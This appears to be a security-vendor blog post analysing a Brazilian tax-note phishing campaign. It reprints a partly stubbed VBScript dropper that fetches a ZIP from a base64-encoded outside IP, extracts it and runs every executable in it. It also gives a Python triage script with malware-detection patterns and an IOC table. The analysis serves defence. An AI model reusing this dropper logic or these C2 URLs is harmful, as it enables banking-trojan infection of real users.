It’s a Small World After All

The other day I decided to take a walkabout in our data and explore what the rest of the world sees. It didn't take long to find a poorly constructed Brazilian tax note phish spoofing the country's Ministry of Economy. The actor's phish template is sloppy, switching between an invoice phish and a tax note phish.

As you have probably guessed, that link does not go to the Ministry of Economy, nor is it an electronic tax note. In fact, it downloads a ZIP file containing a VBScript. The script is minimally obfuscated and rather simple, so I will only provide a stripped-down version.

```vbscript
' Resolve %APPDATA% and build the drop folder path
Set objShellSW = CreateObject( "WScript.Shell" )
noqrtvvwyyABBDEEGIJ = objShellSW.ExpandEnvironmentStrings("%APPDATA%")
Set wshShell = CreateObject("WScript.Shell")
BBDEGIIJLNNOQQRTTV = noqrtvvwyyABBDEEGIJ + "\realteknv"
' Stub in this stripped-down listing: exit if the drop folder already exists (infection marker)
Exit_if_BBDEGIIJLNNOQQRTTV_exists
' Decoy error dialog so the victim believes the "tax note" simply failed to open
msgbox "   FILE  NOT  FOUND    ", vbInformation, "Windows"
Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
oFSO.CreateFolder BBDEGIIJLNNOQQRTTV
' Base64-encoded URLs (decoded values are listed below the script)
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
NPQQUUVXXZaacdffhi = BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
' Stub in this stripped-down listing: HTTP download of the payload to the path above
download_payload
' Extract the ZIP with Shell.Application (copyHere flag 4 = no progress dialog)
ZipFile = BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
ExtractTo = BBDEGIIJLNNOQQRTTV & "./"
Set fso = CreateObject("Scripting.FileSystemObject")
sourceFile = fso.GetAbsolutePathName(ZipFile)
destFolder = fso.GetAbsolutePathName(ExtractTo)
Set objShell = CreateObject("Shell.Application")
Set FilesInZip = objShell.NameSpace(sourceFile).Items()
objShell.NameSpace(destFolder).copyHere FilesInZip, 4
' Delete the archive once it has been extracted
Set objFSOx = CreateObject("Scripting.FileSystemObject")
If objFSOx.FileExists(BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip") Then objFSOx.DeleteFile BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
' Enumerate the drop folder and run every .exe found in it
Set objFSOw = CreateObject("Scripting.FileSystemObject")
objStartFolder = BBDEGIIJLNNOQQRTTV
Set objFolder = objFSOw.GetFolder(objStartFolder)
Set colFiles = objFolder.Files
Dim objShellLM
Set objShellLM = WScript.CreateObject( "WScript.Shell" )
For Each objFile in colFiles
    If UCase(objFSOw.GetExtensionName(objFile.name)) = "EXE" Then
        ' File name with the .exe suffix removed
        wyABDFFGIIJLNNOQQST = Replace(objFile.Name, ".exe", "")
        ffgiklnnpqsstvvxy = BBDEGIIJLNNOQQRTTV & "\" & objFile.Name
        objShellLM.Exec(ffgiklnnpqsstvvxy)
    End If
Next
' Closing GET request to the decoded URL held in Zbccgghjjlmmoqrrtu
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", Zbccgghjjlmmoqrrtu, False
o.send
```

The script starts by base64-decoding those two strings, which yield (1) hxxp://3.81.170[.]195/grl/ and (2) hxxp://3.81.170[.]195/bc5279e8-34ac-4d16-a8f2-b9bd90448a0.zip. Then it downloads the payload from (1), extracts the EXE from the ZIP archive, removes the extension, and executes the payload. Finally, it sends a GET request to (2).
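Because the dropper's only real obfuscation is base64-wrapped URLs and randomised variable names, a small static triage script is enough to pull out the indicators and flag the behaviours above (shell execution, ZIP extraction via Shell.Application, an MSXML2 HTTP client). The following is an added example written for this post, not code from the original sample or from Cofense; the `SAMPLE_VBS` excerpt is constructed to mirror the listing above, and the pattern set is an assumed, minimal one an analyst would extend.

```python
import base64
import re

# Constructed excerpt mirroring the dropper's structure (not the live sample itself).
SAMPLE_VBS = r'''
Set objShellSW = CreateObject( "WScript.Shell" )
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
Set objShell = CreateObject("Shell.Application")
objShell.NameSpace(destFolder).copyHere FilesInZip, 4
objShellLM.Exec(ffgiklnnpqsstvvxy)
Set o = CreateObject("MSXML2.XMLHTTP")
'''

# Assumed, minimal behaviour patterns; a real triage set would be broader.
SUSPICIOUS_PATTERNS = {
    "shell-exec": re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)|\.Exec\(', re.I),
    "zip-extract": re.compile(r'Shell\.Application|\.copyHere', re.I),
    "http-client": re.compile(r'MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest', re.I),
}
B64_LITERAL = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')

def decode_b64_literal(s: str) -> str:
    """Decode a base64 literal, tolerating missing '=' padding (the sample omits it)."""
    padded = s + "=" * (-len(s) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")

def defang(url: str) -> str:
    """Make a URL non-clickable: http -> hxxp and the last dot of the host -> [.]"""
    url = re.sub(r"^http", "hxxp", url, flags=re.I)
    m = re.match(r"^(hxxps?://)([^/]+)(.*)$", url, flags=re.I)
    if not m:
        return url
    scheme, host, rest = m.groups()
    head, _, tail = host.rpartition(".")
    return f"{scheme}{head}[.]{tail}{rest}"

def triage_vbs(text: str) -> dict:
    """Return the behaviour tags that fired and the defanged decoded URLs."""
    tags = sorted(tag for tag, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text))
    urls = [defang(decode_b64_literal(b)) for b in B64_LITERAL.findall(text)]
    return {"tags": tags, "urls": urls}

if __name__ == "__main__":
    print(triage_vbs(SAMPLE_VBS))
```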

And what sort of goodness does that payload deliver? Well, it is a Brazilian phish, so you would be correct if you said a generic Delphi-based Brazilian banking trojan. Many anti-virus vendors label these Banload, Boleto, or Delf.

| IOC | Type | Notes |
| --- | --- | --- |
| 3.81.170.195 | IP Address | C2 Address |
| dcd9ce1d719c4c7f3a06aaf320dd57f20fd9c228f21d56b118b1d28a726eecae | SHA256 | Zip file |
| 6c1708f6d07e2f947f1e9cf1df24d0ba3d43a87c58c4c066a67072daeb73c61b | SHA256 | VBScript |
| 1085cc04386f819f56f56ce15f63bff09336b44785ab93e7f75c073282c07e6c | SHA256 | Banking trojan |


All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.